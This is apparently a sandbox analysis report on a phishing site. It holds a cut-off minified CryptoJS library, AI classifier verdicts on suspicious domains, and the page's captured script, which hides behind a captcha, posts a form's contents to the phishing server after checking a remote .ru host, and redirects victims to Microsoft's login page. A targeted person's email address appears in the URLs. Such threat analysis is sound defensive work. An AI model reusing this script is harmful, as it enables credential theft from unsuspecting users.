!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, but also sets up event handlers and makes network requests to external domains, some of which appear to be of dubious reputation. The script also attempts to bypass form submission and redirect the user to a Microsoft login page, which is highly suspicious behavior. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA4xpzEaQEpRQpIL',
'error-callback': mGZdulPAWs,
callback: wUGIIeycBV,
});
function mGZdulPAWs() {
turnstile.reset();
}
function wUGIIeycBV() {
var TbuYWAUnKz = document.getElementById("WUjxcQoIzq");
TbuYWAUnKz.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'G1xR';
var WBtPFZHLWq = "../bvoJGGwJHKeZzLomckvyslTHXQ78FJQOjb8ukQaYzqyo";
fetch('https://NxUujJ8C2BDEATmAUJLbR0mL0O8s217ndkeEUkkFGrp7cLtltzTRBLLkS.deryposi.ru/0458868437923494185314AvFfRASDURCMIEOEIMZYQAMHZHZYCBKHAUNOCTQRNXGYXCEHFBRPOK', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(WBtPFZHLWq, {
method: "POST",
body: new FormData(TbuYWAUnKz)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(afeLvoFhem == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://pending-revew.pages.dev Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true,
"reasoning": "The URL contains a misspelling of 'review' as 'revew' which indicates typosquatting. The .pages.dev TLD is associated with Cloudflare Pages hosting service, which is often used by attackers for phishing. The word 'pending' combined with misspelled 'review' suggests this might be a credential harvesting attempt."
} |
URL: https://pending-revew.pages.dev |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://topimo.trilidarn.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true,
"reasoning": "The URL uses a .ru (Russian) TLD which is often associated with suspicious activities. The domain name appears to be randomly generated or meaningless, and is not a known legitimate service. Russian TLD combined with an unknown domain increases suspicion level."
} |
URL: https://topimo.trilidarn.ru |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
chrome.exe (PID: 6892 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node